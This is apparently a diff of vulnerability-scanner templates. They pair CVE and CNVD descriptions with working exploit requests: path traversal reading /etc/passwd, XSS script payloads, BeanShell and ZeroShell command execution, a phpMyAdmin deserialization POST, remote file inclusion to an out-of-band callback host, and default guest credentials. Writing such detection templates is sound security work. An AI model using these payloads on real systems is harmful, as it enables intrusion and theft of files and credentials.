| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
|
||||
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
|
|
@ -0,0 +1,27 @@
|
|||
id: CNVD-2019-01348
|
||||
|
||||
info:
|
||||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/"
|
||||
headers:
|
||||
Accept-Encoding: deflate
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
part: body
|
||||
condition: and
|
|
@ -0,0 +1,26 @@
|
|||
id: CNVD-2020-23735
|
||||
|
||||
info:
|
||||
name: Xxunchi Local File read
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/2025171
|
||||
tags: xunchi,lfi,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||
- "display_errors"
|
||||
part: body
|
||||
condition: and
|
|
@ -0,0 +1,30 @@
|
|||
id: CNVD-2020-56167
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Default Password
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||
tags: ruijie,default-login,cnvd
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
|
||||
headers:
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Level was: LEVEL15"
|
||||
- "/WEB_VMS/LEVEL15/"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||
tags: lfi
|
||||
tags: lfi,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,11 +1,11 @@
|
|||
id: weiphp-path-traversal
|
||||
id: CNVD-2020-68596
|
||||
|
||||
info:
|
||||
name: WeiPHP 5.0 Path Traversal
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||
tags: weiphp,lfi
|
||||
tags: weiphp,lfi,cnvd
|
||||
|
||||
requests:
|
||||
- raw:
|
|
@ -1,11 +1,11 @@
|
|||
id: eea-disclosure
|
||||
id: CNVD-2021-10543
|
||||
|
||||
info:
|
||||
name: EEA Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||
tags: config,exposure
|
||||
tags: config,exposure,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -0,0 +1,27 @@
|
|||
id: CNVD-2021-15822
|
||||
|
||||
info:
|
||||
name: ShopXO Download File Read
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
|
||||
tags: shopxo,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CNVD-2021-17369
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||
tags: ruijie,disclosure,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/xml/webuser-auth.xml"
|
||||
headers:
|
||||
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<userauth>"
|
||||
- "<password>"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CNVD-2021-30167
|
||||
|
||||
info:
|
||||
name: UFIDA NC BeanShell Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: |
|
||||
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||
tags: beanshell,rce,cnvd
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- | #linux
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("id");
|
||||
|
||||
- | #windows
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("ipconfig");
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid="
|
||||
- "Windows IP"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "BeanShell Test Servlet"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,6 +4,10 @@ info:
|
|||
author: CasperGN
|
||||
severity: medium
|
||||
tags: cve,cve2005
|
||||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
|
||||
reference: |
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2005-4385
|
||||
|
||||
info:
|
||||
name: Cofax <= 2.0RC3 XSS
|
||||
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
||||
reference:
|
||||
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cofax,xss,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'>\"</script><script>alert(document.domain)</script>"
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2006-1681
|
||||
|
||||
info:
|
||||
name: Cherokee HTTPD <=0.5 XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
|
||||
reference:
|
||||
- https://www.securityfocus.com/bid/17408
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cherokee,httpd,xss,cve,cve2006
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2007-0885
|
||||
|
||||
info:
|
||||
name: Rainbow.Zen Jira XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cve,cve2007,jira,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "\"><script>alert('{{randstr}}')</script>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apache Struts2 S2-001 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
|
||||
reference: https://www.guildhab.top/?p=2326
|
||||
tags: cve,cve2007,apache,rce,struts
|
||||
|
||||
|
@ -21,7 +22,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -4,6 +4,8 @@ info:
|
|||
name: AppServ Open Project 2.5.10 and earlier XSS
|
||||
author: unstabl3
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
||||
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
||||
tags: cve,cve2008,xss
|
||||
|
||||
requests:
|
||||
|
|
|
@ -3,6 +3,8 @@ info:
|
|||
name: CMSimple 3.1 - Local File Inclusion
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
|
||||
reference: https://www.exploit-db.com/exploits/5700
|
||||
tags: cve,cve2008,lfi
|
||||
requests:
|
||||
|
@ -19,5 +21,5 @@ requests:
|
|||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-6668
|
||||
|
||||
info:
|
||||
name: nweb2fax <= 0.2.7 Directory Traversal
|
||||
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5856
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: nweb2fax,lfi,cve,cve2008
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2009-0545
|
||||
|
||||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference: https://www.exploit-db.com/exploits/8023
|
||||
severity: critical
|
||||
tags: cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2009-0932
|
||||
|
||||
info:
|
||||
name: Horde - Horde_Image::factory driver Argument LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/16154
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
|
||||
tags: cve,cve2009,horde,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2009-1151
|
||||
|
||||
info:
|
||||
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
||||
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||||
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||||
tags: cve,cve2009,phpmyadmin,rce,deserialization
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /scripts/setup.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 80
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2009-1558
|
||||
|
||||
info:
|
||||
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/32954
|
||||
tags: cve,cve2009,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2009-1872
|
||||
|
||||
info:
|
||||
name: Adobe Coldfusion 8 linked XSS vulnerabilies
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
|
||||
reference: |
|
||||
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
|
||||
- https://www.tenable.com/cve/CVE-2009-1872
|
||||
tags: cve,cve2009,adobe,xss,coldfusion
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?></script><script>alert(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2009-4223
|
||||
|
||||
info:
|
||||
name: KR-Web <= 1.1b2 RFI
|
||||
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/krw/
|
||||
- https://www.exploit-db.com/exploits/10216
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: cve,cve2009,krweb,rfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-2307
|
||||
|
||||
info:
|
||||
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
|
||||
reference: |
|
||||
- https://www.securityfocus.com/bid/40550/info
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
|
||||
tags: cve,cve2010,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2682
|
||||
|
||||
info:
|
||||
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/14017
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2682
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,10 @@ info:
|
|||
name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
|
||||
description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
|
||||
reference: |
|
||||
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
|
||||
- http://www.adobe.com/support/security/bulletins/apsb10-18.html
|
||||
tags: cve,cve2010,coldfusion,lfi
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-4231
|
||||
|
||||
info:
|
||||
name: Camtron CMNC-200 IP Camera - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
|
||||
- https://www.exploit-db.com/exploits/15505
|
||||
tags: cve,cve2010,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4617
|
||||
|
||||
info:
|
||||
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/15791
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4617
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2011-0049
|
||||
|
||||
info:
|
||||
name: Majordomo2 - SMTP/HTTP Directory Traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/16103
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-0063
|
||||
- http://www.kb.cert.org/vuls/id/363726
|
||||
tags: cve,cve2011,majordomo2,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2011-1669
|
||||
|
||||
info:
|
||||
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
|
||||
reference: |
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
|
||||
- https://www.exploit-db.com/exploits/17119
|
||||
tags: cve,cve2011,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2011-3315
|
||||
|
||||
info:
|
||||
name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
|
||||
reference: https://www.exploit-db.com/exploits/36256
|
||||
tags: cve,cve2011,lfi,cisco
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2011-4336
|
||||
|
||||
info:
|
||||
